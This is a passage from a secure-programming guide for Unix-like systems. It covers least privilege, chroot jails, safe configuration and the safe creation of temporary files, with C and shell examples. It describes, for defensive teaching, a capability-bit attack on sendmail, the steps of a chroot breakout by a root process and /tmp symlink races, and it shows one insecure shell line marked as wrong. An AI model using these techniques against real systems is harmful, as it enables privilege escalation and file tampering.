    carried over. The way that this can be exploited is by setting all of the
    capabilities to zero (meaning, all of the bits are off) in each of the
    three bitfields and then executing a setuid program that attempts to drop
    privileges before executing code that could be dangerous if run as root,
    such as what sendmail does. When sendmail attempts to drop privileges
    using setuid(getuid()), it fails not having the capabilities required to
    do so in its bitfields and with no checks on its return value . It
    continues executing with superuser privileges, and can run a users
    .forward file as root leading to a complete compromise.

One approach, used by sendmail, is to attempt to do setuid(0) after a setuid
(getuid()); normally this should fail. If it succeeds, the program should
stop. For more information, see http://sendmail.net/?feed=000607linuxbug. In
the short term this might be a good idea in other programs, though clearly
the better long-term approach is to upgrade the underlying system.
-----------------------------------------------------------------------------

7.4.3. Minimize the Time the Privilege is Active

Use setuid(2), seteuid(2), setgroups(2), and related functions to ensure that
the program only has these privileges active when necessary, and then
temporarily deactivate the privilege when it's not in use. As noted above,
you might want to ensure that these privileges are disabled while parsing
user input, but more generally, only turn on privileges when they're actually
needed.

Note that some buffer overflow attacks, if successful, can force a program to
run arbitrary code, and that code could re-enable privileges that were
temporarily dropped. Thus, there are many attacks that temporarily
deactivating a privilege won't counter - it's always much better to
completely drop privileges as soon as possible. There are many papers that
describe how to do this, such as "Designing Shellcode Demystified". Some
people even claim that ``seteuid() [is] considered harmful'' because of the
many attacks it doesn't counter. Still, temporarily deactivating these
permissions prevents a whole class of attacks, such as techniques to convince
a program to write into a file that perhaps it didn't intend to write into.
Since this technique prevents many attacks, it's worth doing if permanently
dropping the privilege can't be done at that point in the program.
-----------------------------------------------------------------------------

7.4.4. Minimize the Modules Granted the Privilege

If only a few modules are granted the privilege, then it's much easier to
determine if they're secure. One way to do so is to have a single module use
the privilege and then drop it, so that other modules called later cannot
misuse the privilege. Another approach is to have separate commands in
separate executables; one command might be a complex tool that can do a vast
number of tasks for a privileged user (e.g., root), while the other tool is
setuid but is a small, simple tool that only permits a small command subset
(and does not trust its invoker). The small, simple tool checks to see if the
input meets various criteria for acceptability, and then if it determines the
input is acceptable, it passes the data on to the complex tool. Note that the
small, simple tool must do a thorough job checking its inputs and limiting
what it will pass along to the complex tool, or this can be a vulnerability.
The communication could be via shell invocation, or any IPC mechanism. These
approaches can even be layered several ways, for example, a complex user tool
could call a simple setuid ``wrapping'' program (that checks its inputs for
secure values) that then passes on information to another complex trusted
tool.

This approach is the normal approach for developing GUI-based applications
which requre privilege, but must be run by unprivileged users. The GUI
portion is run as a normal unprivileged user process; that process then
passes security-relevant requests on to another process that has the special
privileges (and does not trust the first process, but instead limits the
requests to whatever the user is allowed to do). Never develop a program that
is privileged (e.g., using setuid) and also directly invokes a graphical
toolkit: Graphical toolkits aren't designed to be used this way, and it would
be extremely difficult to audit graphical toolkits in a way to make this
possible. Fundamentally, graphical toolkits must be large, and it's extremely
unwise to place so much faith in the perfection of that much code, so there
is no point in trying to make them do what should never be done. Feel free to
create a small setuid program that invokes two separate programs: one without
privileges (but with the graphical interface), and one with privileges (and
without an external interface). Or, create a small setuid program that can be
invoked by the unprivileged GUI application. But never combine the two into a
single process. For more about this, see the statement by Owen Taylor about
GTK and setuid, discussing why GTK_MODULES is not a security hole.

Some applications can be best developed by dividing the problem into smaller,
mutually untrusting programs. A simple way is divide up the problem into
separate programs that do one thing (securely), using the filesystem and
locking to prevent problems between them. If more complex interactions are
needed, one approach is to fork into multiple processes, each of which has
different privilege. Communications channels can be set up in a variety of
ways; one way is to have a "master" process create communication channels
(say unnamed pipes or unnamed sockets), then fork into different processes
and have each process drop as many privileges as possible. If you're doing
this, be sure to watch for deadlocks. Then use a simple protocol to allow the
less trusted processes to request actions from the more trusted process(es),
and ensure that the more trusted processes only support a limited set of
requests. Setting user and group permissions so that no one else can even
start up the sub-programs makes it harder to break into.

Some operating systems have the concept of multiple layers of trust in a
single process, e.g., Multics' rings. Standard Unix and Linux don't have a
way of separating multiple levels of trust by function inside a single
process like this; a call to the kernel increases privileges, but otherwise a
given process has a single level of trust. This is one area where
technologies like Java 2, C# (which copies Java's approach), and Fluke (the
basis of security-enhanced Linux) have an advantage. For example, Java 2 can
specify fine-grained permissions such as the permission to only open a
specific file. However, general-purpose operating systems do not typically
have such abilities at this time; this may change in the near future. For
more about Java, see Section 10.6.
-----------------------------------------------------------------------------

7.4.5. Consider Using FSUID To Limit Privileges

Each Linux process has two Linux-unique state values called filesystem user
id (FSUID) and filesystem group id (FSGID). These values are used when
checking against the filesystem permissions. If you're building a program
that operates as a file server for arbitrary users (like an NFS server), you
might consider using these Linux extensions. To use them, while holding root
privileges change just FSUID and FSGID before accessing files on behalf of a
normal user. This extension is fairly useful, and provides a mechanism for
limiting filesystem access rights without removing other (possibly necessary)
rights. By only setting the FSUID (and not the EUID), a local user cannot
send a signal to the process. Also, avoiding race conditions is much easier
in this situation. However, a disadvantage of this approach is that these
calls are not portable to other Unix-like systems.
-----------------------------------------------------------------------------

7.4.6. Consider Using Chroot to Minimize Available Files

You can use chroot(2) to limit the files visible to your program. This
requires carefully setting up a directory (called the ``chroot jail'') and
correctly entering it. This can be a fairly effective technique for improving
a program's security - it's hard to interfere with files you can't see.
However, it depends on a whole bunch of assumptions, in particular, the
program must lack root privileges, it must not have any way to get root
privileges, and the chroot jail must be properly set up (e.g., be careful
what you put inside the chroot jail, and make sure that users can never
control its contents before calling chroot). I recommend using chroot(2)
where it makes sense to do so, but don't depend on it alone; instead, make it
part of a layered set of defenses. Here are a few notes about the use of
chroot(2):

<A0><A0>*<2A>The program can still use non-filesystem objects that are shared across
    the entire machine (such as System V IPC objects and network sockets).
    It's best to also use separate pseudo-users and/or groups, because all
    Unix-like systems include the ability to isolate users; this will at
    least limit the damage a subverted program can do to other programs. Note
    that current most Unix-like systems (including Linux) won't isolate
    intentionally cooperating programs; if you're worried about malicious
    programs cooperating, you need to get a system that implements some sort
    of mandatory access control and/or limits covert channels.

<A0><A0>*<2A>Be sure to close any filesystem descriptors to outside files if you don't
    want them used later. In particular, don't have any descriptors open to
    directories outside the chroot jail, or set up a situation where such a
    descriptor could be given to it (e.g., via Unix sockets or an old
    implementation of /proc). If the program is given a descriptor to a
    directory outside the chroot jail, it could be used to escape out of the
    chroot jail.

<A0><A0>*<2A>The chroot jail has to be set up to be secure - it must never be
    controlled by a user and every file added must be carefully examined.
    Don't use a normal user's home directory, subdirectory, or other
    directory that can ever be controlled by a user as a chroot jail; use a
    separate directory directory specially set aside for the purpose. Using a
    directory controlled by a user is a disaster - for example, the user
    could create a ``lib'' directory containing a trojaned linker or libc
    (and could link a setuid root binary into that space, if the files you
    save don't use it). Place the absolute minimum number of files and
    directories there. Typically you'll have a /bin, /etc/, /lib, and maybe
    one or two others (e.g., /pub if it's an ftp server). Place in /bin only
    what you need to run after doing the chroot(); sometimes you need nothing
    at all (try to avoid placing a shell like /bin/sh there, though sometimes
    that can't be helped). You may need a /etc/passwd and /etc/group so file
    listings can show some correct names, but if so, try not to include the
    real system's values, and certainly replace all passwords with "*".

    In /lib, place only what you need; use ldd(1) to query each program in /
    bin to find out what it needs, and only include them. On Linux, you'll
    probably need a few basic libraries like ld-linux.so.2, and not much
    else. Alternatively, recompile any necessary programs to be statically
    linked, so that they don't need dynamically loaded libraries at all.

    It's usually wiser to completely copy in all files, instead of making
    hard links; while this wastes some time and disk space, it makes it so
    that attacks on the chroot jail files do not automatically propagate into
    the regular system's files. Mounting a /proc filesystem, on systems where
    this is supported, is generally unwise. In fact, in very old versions of
    Linux (versions 2.0.x, at least up through 2.0.38) it's a known security
    flaw, since there are pseudo-directories in /proc that would permit a
    chroot'ed program to escape. Linux kernel 2.2 fixed this known problem,
    but there may be others; if possible, don't do it.

<A0><A0>*<2A>Chroot really isn't effective if the program can acquire root privilege.
    For example, the program could use calls like mknod(2) to create a device
    file that can view physical memory, and then use the resulting device
    file to modify kernel memory to give itself whatever privileges it
    desired. Another example of how a root program can break out of chroot is
    demonstrated at [http://www.suid.edu/source/breakchroot.c] http://
    www.suid.edu/source/breakchroot.c. In this example, the program opens a
    file descriptor for the current directory, creates and chroots into a
    subdirectory, sets the current directory to the previously-opened current
    directory, repeatedly cd's up from the current directory (which since it
    is outside the current chroot succeeds in moving up to the real
    filesystem root), and then calls chroot on the result. By the time you
    read this, these weaknesses may have been plugged, but the reality is
    that root privilege has traditionally meant ``all privileges'' and it's
    hard to strip them away. It's better to assume that a program requiring
    continuous root privileges will only be mildly helped using chroot(). Of
    course, you may be able to break your program into parts, so that at
    least part of it can be in a chroot jail.


-----------------------------------------------------------------------------

7.4.7. Consider Minimizing the Accessible Data

Consider minimizing the amount of data that can be accessed by the user. For
example, in CGI scripts, place all data used by the CGI script outside of the
document tree unless there is a reason the user needs to see the data
directly. Some people have the false notion that, by not publicly providing a
link, no one can access the data, but this is simply not true.
-----------------------------------------------------------------------------

7.4.8. Consider Minimizing the Resources Available

Consider minimizing the computer resources available to a given process so
that, even if it ``goes haywire,'' its damage can be limited. This is a
fundamental technique for preventing a denial of service. For network
servers, a common approach is to set up a separate process for each session,
and for each process limit the amount of CPU time (et cetera) that session
can use. That way, if an attacker makes a request that chews up memory or
uses 100% of the CPU, the limits will kick in and prevent that single session
from interfering with other tasks. Of course, an attacker can establish many
sessions, but this at least raises the bar for an attack. See Section 3.6 for
more information on how to set these limits (e.g., ulimit(1)).
-----------------------------------------------------------------------------

7.5. Minimize the Functionality of a Component

In a related move, minimize the amount of functionality provided by your
component. If it does several functions, consider breaking its implementation
up into those smaller functions. That way, users who don't need some
functions can disable just those portions. This is particularly important
when a flaw is discovered - this way, users can disable just one component
and still use the other parts.
-----------------------------------------------------------------------------

7.6. Avoid Creating Setuid/Setgid Scripts

Many Unix-like systems, in particular Linux, simply ignore the setuid and
setgid bits on scripts to avoid the race condition described earlier. Since
support for setuid scripts varies on Unix-like systems, they're best avoided
in new applications where possible. As a special case, Perl includes a
special setup to support setuid Perl scripts, so using setuid and setgid is
acceptable in Perl if you truly need this kind of functionality. If you need
to support this kind of functionality in your own interpreter, examine how
Perl does this. Otherwise, a simple approach is to ``wrap'' the script with a
small setuid/setgid executable that creates a safe environment (e.g., clears
and sets environment variables) and then calls the script (using the script's
full path). Make sure that the script cannot be changed by an attacker! Shell
scripting languages have additional problems, and really should not be setuid
/setgid; see Section 10.4 for more information about this.
-----------------------------------------------------------------------------

7.7. Configure Safely and Use Safe Defaults

Configuration is considered to currently be the number one security problem.
Therefore, you should spend some effort to (1) make the initial installation
secure, and (2) make it easy to reconfigure the system while keeping it
secure.

Never have the installation routines install a working ``default'' password.
If you need to install new ``users'', that's fine - just set them up with an
impossible password, leaving time for administrators to set the password (and
leaving the system secure before the password is set). Administrators will
probably install hundreds of packages and almost certainly forget to set the
password - it's likely they won't even know to set it, if you create a
default password.

A program should have the most restrictive access policy until the
administrator has a chance to configure it. Please don't create ``sample''
working users or ``allow access to all'' configurations as the starting
configuration; many users just ``install everything'' (installing all
available services) and never get around to configuring many services. In
some cases the program may be able to determine that a more generous policy
is reasonable by depending on the existing authentication system, for
example, an ftp server could legitimately determine that a user who can log
into a user's directory should be allowed to access that user's files. Be
careful with such assumptions, however.

Have installation scripts install a program as safely as possible. By
default, install all files as owned by root or some other system user and
make them unwriteable by others; this prevents non-root users from installing
viruses. Indeed, it's best to make them unreadable by all but the trusted
user. Allow non-root installation where possible as well, so that users
without root privileges and administrators who do not fully trust the
installer can still use the program.

When installing, check to make sure that any assumptions necessary for
security are true. Some library routines are not safe on some platforms; see
the discussion of this in Section 8.1. If you know which platforms your
application will run on, you need not check their specific attributes, but in
that case you should check to make sure that the program is being installed
on only one of those platforms. Otherwise, you should require a manual
override to install the program, because you don't know if the result will be
secure.

Try to make configuration as easy and clear as possible, including
post-installation configuration. Make using the ``secure'' approach as easy
as possible, or many users will use an insecure approach without
understanding the risks. On Linux, take advantage of tools like linuxconf, so
that users can easily configure their system using an existing
infrastructure.

If there's a configuration language, the default should be to deny access
until the user specifically grants it. Include many clear comments in the
sample configuration file, if there is one, so the administrator understands
what the configuration does.
-----------------------------------------------------------------------------

7.8. Load Initialization Values Safely

Many programs read an initialization file to allow their defaults to be
configured. You must ensure that an attacker can't change which
initialization file is used, nor create or modify that file. Often you should
not use the current directory as a source of this information, since if the
program is used as an editor or browser, the user may be viewing the
directory controlled by someone else. Instead, if the program is a typical
user application, you should load any user defaults from a hidden file or
directory contained in the user's home directory. If the program is setuid/
setgid, don't read any file controlled by the user unless you carefully
filter it as an untrusted (potentially hostile) input. Trusted configuration
values should be loaded from somewhere else entirely (typically from a file
in /etc).
-----------------------------------------------------------------------------

7.9. Fail Safe

A secure program should always ``fail safe'', that is, it should be designed
so that if the program does fail, the safest result should occur. For
security-critical programs, that usually means that if some sort of
misbehavior is detected (malformed input, reaching a ``can't get here''
state, and so on), then the program should immediately deny service and stop
processing that request. Don't try to ``figure out what the user wanted'':
just deny the service. Sometimes this can decrease reliability or useability
(from a user's perspective), but it increases security. There are a few cases
where this might not be desired (e.g., where denial of service is much worse
than loss of confidentiality or integrity), but such cases are quite rare.

Note that I recommend ``stop processing the request'', not ``fail
altogether''. In particular, most servers should not completely halt when
given malformed input, because that creates a trivial opportunity for a
denial of service attack (the attacker just sends garbage bits to prevent you
from using the service). Sometimes taking the whole server down is necessary,
in particular, reaching some ``can't get here'' states may signal a problem
so drastic that continuing is unwise.

Consider carefully what error message you send back when a failure is
detected. if you send nothing back, it may be hard to diagnose problems, but
sending back too much information may unintentionally aid an attacker.
Usually the best approach is to reply with ``access denied'' or
``miscellaneous error encountered'' and then write more detailed information
to an audit log (where you can have more control over who sees the
information).
-----------------------------------------------------------------------------

7.10. Avoid Race Conditions

A ``race condition'' can be defined as ``Anomalous behavior due to unexpected
critical dependence on the relative timing of events'' [FOLDOC]. Race
conditions generally involve one or more processes accessing a shared
resource (such a file or variable), where this multiple access has not been
properly controlled.

In general, processes do not execute atomically; another process may
interrupt it between essentially any two instructions. If a secure program's
process is not prepared for these interruptions, another process may be able
to interfere with the secure program's process. Any pair of operations in a
secure program must still work correctly if arbitrary amounts of another
process's code is executed between them.

Race condition problems can be notionally divided into two categories:

<A0><A0>*<2A>Interference caused by untrusted processes. Some security taxonomies call
    this problem a ``sequence'' or ``non-atomic'' condition. These are
    conditions caused by processes running other, different programs, which
    ``slip in'' other actions between steps of the secure program. These
    other programs might be invoked by an attacker specifically to cause the
    problem. This book will call these sequencing problems.

<A0><A0>*<2A>Interference caused by trusted processes (from the secure program's point
    of view). Some taxonomies call these deadlock, livelock, or locking
    failure conditions. These are conditions caused by processes running the
    ``same'' program. Since these different processes may have the ``same''
    privileges, if not properly controlled they may be able to interfere with
    each other in a way other programs can't. Sometimes this kind of
    interference can be exploited. This book will call these locking
    problems.


-----------------------------------------------------------------------------
7.10.1. Sequencing (Non-Atomic) Problems

In general, you must check your code for any pair of operations that might
fail if arbitrary code is executed between them.

Note that loading and saving a shared variable are usually implemented as
separate operations and are not atomic. This means that an ``increment
variable'' operation is usually converted into loading, incrementing, and
saving operation, so if the variable memory is shared the other process may
interfere with the incrementing.

Secure programs must determine if a request should be granted, and if so, act
on that request. There must be no way for an untrusted user to change
anything used in this determination before the program acts on it. This kind
of race condition is sometimes termed a ``time of check - time of use''
(TOCTOU) race condition.
-----------------------------------------------------------------------------

7.10.1.1. Atomic Actions in the Filesystem

The problem of failing to perform atomic actions repeatedly comes up in the
filesystem. In general, the filesystem is a shared resource used by many
programs, and some programs may interfere with its use by other programs.
Secure programs should generally avoid using access(2) to determine if a
request should be granted, followed later by open(2), because users may be
able to move files around between these calls, possibly creating symbolic
links or files of their own choosing instead. A secure program should instead
set its effective id or filesystem id, then make the open call directly. It's
possible to use access(2) securely, but only when a user cannot affect the
file or any directory along its path from the filesystem root.

When creating a file, you should open it using the modes O_CREAT | O_EXCL and
grant only very narrow permissions (only to the current user); you'll also
need to prepare for having the open fail. If you need to be able to open the
file (e.g,. to prevent a denial-of-service), you'll need to repetitively (1)
create a ``random'' filename, (2) open the file as noted, and (3) stop
repeating when the open succeeds.

Ordinary programs can become security weaknesses if they don't create files
properly. For example, the ``joe'' text editor had a weakness called the
``DEADJOE'' symlink vulnerability. When joe was exited in a nonstandard way
(such as a system crash, closing an xterm, or a network connection going
down), joe would unconditionally append its open buffers to the file
"DEADJOE". This could be exploited by the creation of DEADJOE symlinks in
directories where root would normally use joe. In this way, joe could be used
to append garbage to potentially-sensitive files, resulting in a denial of
service and/or unintentional access.

As another example, when performing a series of operations on a file's
meta-information (such as changing its owner, stat-ing the file, or changing
its permission bits), first open the file and then use the operations on open
files. This means use the fchown( ), fstat( ), or fchmod( ) system calls,
instead of the functions taking filenames such as chown(), chgrp(), and chmod
(). Doing so will prevent the file from being replaced while your program is
running (a possible race condition). For example, if you close a file and
then use chmod() to change its permissions, an attacker may be able to move
or remove the file between those two steps and create a symbolic link to
another file (say /etc/passwd). Other interesting files include /dev/zero,
which can provide an infinitely-long data stream of input to a program; if an
attacker can ``switch'' the file midstream, the results can be dangerous.

But even this gets complicated - when creating files, you must give them as a
minimal set of rights as possible, and then change the rights to be more
expansive if you desire. Generally, this means you need to use umask and/or
open's parameters to limit initial access to just the user and user group.
For example, if you create a file that is initially world-readable, then try
to turn off the ``world readable'' bit, an attacker could try to open the
file while the permission bits said this was okay. On most Unix-like systems,
permissions are only checked on open, so this would result in an attacker
having more privileges than intended.

In general, if multiple users can write to a directory in a Unix-like system,
you'd better have the ``sticky'' bit set on that directory, and sticky
directories had better be implemented. It's much better to completely avoid
the problem, however, and create directories that only a trusted special
process can access (and then implement that carefully). The traditional Unix
temporary directories (/tmp and /var/tmp) are usually implemented as
``sticky'' directories, and all sorts of security problems can still surface,
as we'll see next.
-----------------------------------------------------------------------------

7.10.1.2. Temporary Files

This issue of correctly performing atomic operations particularly comes up
when creating temporary files. Temporary files in Unix-like systems are
traditionally created in the /tmp or /var/tmp directories, which are shared
by all users. A common trick by attackers is to create symbolic links in the
temporary directory to some other file (e.g., /etc/passwd) while your secure
program is running. The attacker's goal is to create a situation where the
secure program determines that a given filename doesn't exist, the attacker
then creates the symbolic link to another file, and then the secure program
performs some operation (but now it actually opened an unintended file).
Often important files can be clobbered or modified this way. There are many
variations to this attack, such as creating normal files, all based on the
idea that the attacker can create (or sometimes otherwise access) file system
objects in the same directory used by the secure program for temporary files.

Michal Zalewski exposed in 2002 another serious problem with temporary
directories involving automatic cleaning of temporary directories. For more
information, see his posting to Bugtraq dated December 20, 2002, (subject "
[RAZOR] Problems with mkstemp()"). Basically, Zalewski notes that it's a
common practice to have a program automatically sweep temporary directories
like /tmp and /var/tmp and remove "old" files that have not been accessed for
a while (e.g., several days). Such programs are sometimes called "tmp
cleaners" (pronounced "temp cleaners"). Possibly the most common tmp cleaner
is "tmpwatch" by Erik Troan and Preston Brown of Red Hat Software; another
common one is 'stmpclean' by Stanislav Shalunov; many administrators roll
their own as well. Unfortunately, the existance of tmp cleaners creates an
opportunity for new security-critical race conditions; an attacker may be
able to arrange things so that the tmp cleaner interferes with the secure
program. For example, an attacker could create an "old" file, arrange for the
tmp cleaner to plan to delete the file, delete the file himself, and run a
secure program that creates the same file - now the tmp cleaner will delete
the secure program's file! Or, imagine that a secure program can have long
delays after using the file (e.g., a setuid program stopped with SIGSTOP and
resumed after many days with SIGCONT, or simply intentionally creating a lot
of work). If the temporary file isn't used for long enough, its temporary
files are likely to be removed by the tmp cleaner.

The general problem when creating files in these shared directories is that
you must guarantee that the filename you plan to use doesn't already exist at
time of creation, and atomically create the file. Checking ``before'' you
create the file doesn't work, because after the check occurs, but before
creation, another process can create that file with that filename. Using an
``unpredictable'' or ``unique'' filename doesn't work in general, because
another process can often repeatedly guess until it succeeds. Once you create
the file atomically, you must alway use the returned file descriptor (or file
stream, if created from the file descriptor using routines like fdopen()).
You must never re-open the file, or use any operations that use the filename
as a parameter - always use the file descriptor or associated stream.
Otherwise, the tmpwatch race issues noted above will cause problems. You
can't even create the file, close it, and re-open it, even if the permissions
limit who can open it. Note that comparing the descriptor and a reopened file
to verify inode numbers, creation times or file ownership is not sufficient -
please refer to "Symlinks and Cryogenic Sleep" by Olaf Kirch.

Fundamentally, to create a temporary file in a shared (sticky) directory, you
must repetitively: (1) create a ``random'' filename, (2) open it using
O_CREAT | O_EXCL and very narrow permissions (which atomically creates the
file and fails if it's not created), and (3) stop repeating when the open
succeeds.

According to the 1997 ``Single Unix Specification'', the preferred method for
creating an arbitrary temporary file (using the C interface) is tmpfile(3).
The tmpfile(3) function creates a temporary file and opens a corresponding
stream, returning that stream (or NULL if it didn't). Unfortunately, the
specification doesn't make any guarantees that the file will be created
securely. In earlier versions of this book, I stated that I was concerned
because I could not assure myself that all implementations do this securely.
I've since found that older System V systems have an insecure implementation
of tmpfile(3) (as well as insecure implementations of tmpnam(3) and tempnam
(3)), so on at least some systems it's absolutely useless. Library
implementations of tmpfile(3) should securely create such files, of course,
but users don't always realize that their system libraries have this security
flaw, and sometimes they can't do anything about it.

Kris Kennaway recommends using mkstemp(3) for making temporary files in
general. His rationale is that you should use well-known library functions to
perform this task instead of rolling your own functions, and that this
function has well-known semantics. This is certainly a reasonable position. I
would add that, if you use mkstemp(3), be sure to use umask(2) to limit the
resulting temporary file permissions to only the owner. This is because some
implementations of mkstemp(3) (basically older ones) make such files readable
and writable by all, creating a condition in which an attacker can read or
write private data in this directory. A minor nuisance is that mkstemp(3)
doesn't directly support the environment variables TMP or TMPDIR (as
discussed below), so if you want to support them you have to add code to do
so. Here's a program in C that demonstrates how to use mkstemp(3) for this
purpose, both directly and when adding support for TMP and TMPDIR:
#include <stdio.h>
#include <stdlib.h>
#include <sys/types.h>
#include <sys/stat.h>

void failure(msg) {
 fprintf(stderr, "%s\n", msg);
 exit(1);
}

/*
 * Given a "pattern" for a temporary filename
 * (starting with the directory location and ending in XXXXXX),
 * create the file and return it.
 * This routines unlinks the file, so normally it won't appear in
 * a directory listing.
 * The pattern will be changed to show the final filename.
 */

FILE *create_tempfile(char *temp_filename_pattern)
{
 int temp_fd;
 mode_t old_mode;
 FILE *temp_file;

 old_mode = umask(077);  /* Create file with restrictive permissions */
 temp_fd = mkstemp(temp_filename_pattern);
 (void) umask(old_mode);
 if (temp_fd == -1) {
   failure("Couldn't open temporary file");
 }
 if (!(temp_file = fdopen(temp_fd, "w+b"))) {
   failure("Couldn't create temporary file's file descriptor");
 }
 if (unlink(temp_filename_pattern) == -1) {
   failure("Couldn't unlink temporary file");
 }
 return temp_file;
}


/*
 * Given a "tag" (a relative filename ending in XXXXXX),
 * create a temporary file using the tag.  The file will be created
 * in the directory specified in the environment variables
 * TMPDIR or TMP, if defined and we aren't setuid/setgid, otherwise
 * it will be created in /tmp.  Note that root (and su'd to root)
 * _will_ use TMPDIR or TMP, if defined.
 *
 */
FILE *smart_create_tempfile(char *tag)
{
 char *tmpdir = NULL;
 char *pattern;
 FILE *result;

 if ((getuid()==geteuid()) && (getgid()==getegid())) {
   if (! ((tmpdir=getenv("TMPDIR")))) {
     tmpdir=getenv("TMP");
   }
 }
 if (!tmpdir) {tmpdir = "/tmp";}

 pattern = malloc(strlen(tmpdir)+strlen(tag)+2);
 if (!pattern) {
   failure("Could not malloc tempfile pattern");
 }
 strcpy(pattern, tmpdir);
 strcat(pattern, "/");
 strcat(pattern, tag);
 result = create_tempfile(pattern);
 free(pattern);
 return result;
}


main() {
 int c;
 FILE *demo_temp_file1;
 FILE *demo_temp_file2;
 char demo_temp_filename1[] = "/tmp/demoXXXXXX";
 char demo_temp_filename2[] = "second-demoXXXXXX";

 demo_temp_file1 = create_tempfile(demo_temp_filename1);
 demo_temp_file2 = smart_create_tempfile(demo_temp_filename2);
 fprintf(demo_temp_file2, "This is a test.\n");
 printf("Printing temporary file contents:\n");
 rewind(demo_temp_file2);
 while (  (c=fgetc(demo_temp_file2)) != EOF) {
   putchar(c);
 }
 putchar('\n');
 printf("Exiting; you'll notice that there are no temporary files on exit.\n");
}

Kennaway states that if you can't use mkstemp(3), then make yourself a
directory using mkdtemp(3), which is protected from the outside world.
However, as Michal Zalewski notes, this is a bad idea if there are tmp
cleaners in use; instead, use a directory inside the user's HOME. Finally, if
you really have to use the insecure mktemp(3), use lots of X's - he suggests
10 (if your libc allows it) so that the filename can't easily be guessed
(using only 6 X's means that 5 are taken up by the PID, leaving only one
random character and allowing an attacker to mount an easy race condition).
Note that this is fundamentally insecure, so you should normally not do this.
I add that you should avoid tmpnam(3) as well - some of its uses aren't
reliable when threads are present, and it doesn't guarantee that it will work
correctly after TMP_MAX uses (yet most practical uses must be inside a loop).

In general, you should avoid using the insecure functions such as mktemp(3)
or tmpnam(3), unless you take specific measures to counter their insecurities
or test for a secure library implementation as part of your installation
routines. If you ever want to make a file in /tmp or a world-writable
directory (or group-writable, if you don't trust the group) and don't want to
use mk*temp() (e.g. you intend for the file to be predictably named), then
always use the O_CREAT and O_EXCL flags to open() and check the return value.
If you fail the open() call, then recover gracefully (e.g. exit).

The GNOME programming guidelines recommend the following C code when creating
filesystem objects in shared (temporary) directories to securely open
temporary files [Quintero 2000]:
 char *filename;
 int fd;

 do {
   filename = tempnam (NULL, "foo");
   fd = open (filename, O_CREAT | O_EXCL | O_TRUNC | O_RDWR, 0600);
   free (filename);
 } while (fd == -1);
Note that, although the insecure function tempnam(3) is being used, it is
wrapped inside a loop using O_CREAT and O_EXCL to counteract its security
weaknesses, so this use is okay. Note that you need to free() the filename.
You should close() and unlink() the file after you are done. If you want to
use the Standard C I/O library, you can use fdopen() with mode "w+b" to
transform the file descriptor into a FILE *. Note that this approach won't
work over NFS version 2 (v2) systems, because older NFS doesn't correctly
support O_EXCL. Note that one minor disadvantage to this approach is that,
since tempnam can be used insecurely, various compilers and security scanners
may give you spurious warnings about its use. This isn't a problem with
mkstemp(3).

If you need a temporary file in a shell script, you're probably best off
using pipes, using a local directory (e.g., something inside the user's home
directory), or in some cases using the current directory. That way, there's
no sharing unless the user permits it. If you really want/need the temporary
file to be in a shared directory like /tmp, do not use the traditional shell
technique of using the process id in a template and just creating the file
using normal operations like ">". Shell scripts can use "$$" to indicate the
PID, but the PID can be easily determined or guessed by an attacker, who can
then pre-create files or links with the same name. Thus the following
"typical" shell script is unsafe:
   echo "This is a test" > /tmp/test$$  # DON'T DO THIS.

If you need a temporary file or directory in a shell script, and you want it
in /tmp, a solution sometimes suggested is to use mktemp(1), which is
intended for use in shell scripts (note that mktemp(1) and mktemp(3) are
different things). However, as Michal Zalewski notes, this is insecure in
many environments that run tmp cleaners; the problem is that when a
privileged program sweeps through a temporary directory, it will probably
expose a race condition. Even if this weren't true, I do not recommend using
shell scripts that create temporary files in shared directories; creating
such files in private directories or using pipes instead is generally
preferable, even if you're sure your tmpwatch program is okay (or that you
have no local users). If you must use mktemp(1), note that mktemp(1) takes a
template, then creates a file or directory using O_EXCL and returns the
resulting name; thus, mktemp(1) won't work on NFS version 2 filesystems. Here
are some examples of correct use of mktemp(1) in Bourne shell scripts; these
examples are straight from the mktemp(1) man page:
 # Simple use of mktemp(1), where the script should quit
 # if it can't get a safe temporary file.
 # Note that this will be INSECURE on many systems, since they use
 # tmpwatch-like programs that will erase "old" files and expose race
 # conditions.

   TMPFILE=`mktemp /tmp/$0.XXXXXX` || exit 1
   echo "program output" >> $TMPFILE

  # Simple example, if you want to catch the error:

   TMPFILE=`mktemp -q /tmp/$0.XXXXXX`
   if [ $? -ne 0 ]; then
      echo "$0: Can't create temp file, exiting..."
      exit 1
   fi

Perl programmers should use File::Temp, which tries to provide a
cross-platform means of securely creating temporary files. However, read the
documentation carefully on how to use it properly first; it includes
interfaces to unsafe functions as well. I suggest explicitly setting its
safe_level to HIGH; this will invoke additional security checks. [http://
search.cpan.org/author/JHI/perl-5.8.0/lib/File/Temp.pm] The Perl 5.8
documentation of File::Temp is available on-line.

Don't reuse a temporary filename (i.e. remove and recreate it), no matter how
you obtained the ``secure'' temporary filename in the first place. An
attacker can observe the original filename and hijack it before you recreate
it the second time. And of course, always use appropriate file permissions.
For example, only allow world/group access if you need the world or a group
to access the file, otherwise keep it mode 0600 (i.e., only the owner can
read or write it).

Clean up after yourself, either by using an exit handler, or making use of
UNIX filesystem semantics and unlink()ing the file immediately after creation
so the directory entry goes away but the file itself remains accessible until
the last file descriptor pointing to it is closed. You can then continue to
access it within your program by passing around the file descriptor.
Unlinking the file has a lot of advantages for code maintenance: the file is
automatically deleted, no matter how your program crashes. It also decreases
the likelihood that a maintainer will insecurely use the filename (they need
to use the file descriptor instead). The one minor problem with immediate
unlinking is that it makes it slightly harder for administrators to see how
disk space is being used, since they can't simply look at the file system by
name.

You might consider ensuring that your code for Unix-like systems respects the
environment variables TMP or TMPDIR if the provider of these variable values
is trusted. By doing so, you make it possible for users to move their
temporary files into an unshared directory (and eliminating the problems
discussed here), such as a subdirectory inside their home directory. Recent
versions of Bastille can set these variables to reduce the sharing between
users. Unfortunately, many users set TMP or TMPDIR to a shared directory (say
/tmp), so your secure program must still correctly create temporary files
even if these environment variables are set. This is one advantage of the
GNOME approach, since at least on some systems tempnam(3) automatically uses
TMPDIR, while the mkstemp(3) approach requires more code to do this. Please
don't create yet more environment variables for temporary directories (such
as TEMP), and in particular don't create a different environment name for
each application (e.g., don't use "MYAPP_TEMP"). Doing so greatly complicates
managing systems, and users wanting a special temporary directory for a
specific application can just set the environment variable specially when
running that particular application. Of course, if these environment
variables might have been set by an untrusted source, you should ignore them
- which you'll do anyway if you follow the advice in Section 5.2.3.

These techniques don't work if the temporary directory is remotely mounted
using NFS version 2 (NFSv2), because NFSv2 doesn't properly support O_EXCL.
See Section 7.10.2.1 for more information. NFS version 3 and later properly
support O_EXCL; the simple solution is to ensure that temporary directories
are either local or, if mounted using NFS, mounted using NFS version 3 or
later. There is a technique for safely creating temporary files on NFS v2,
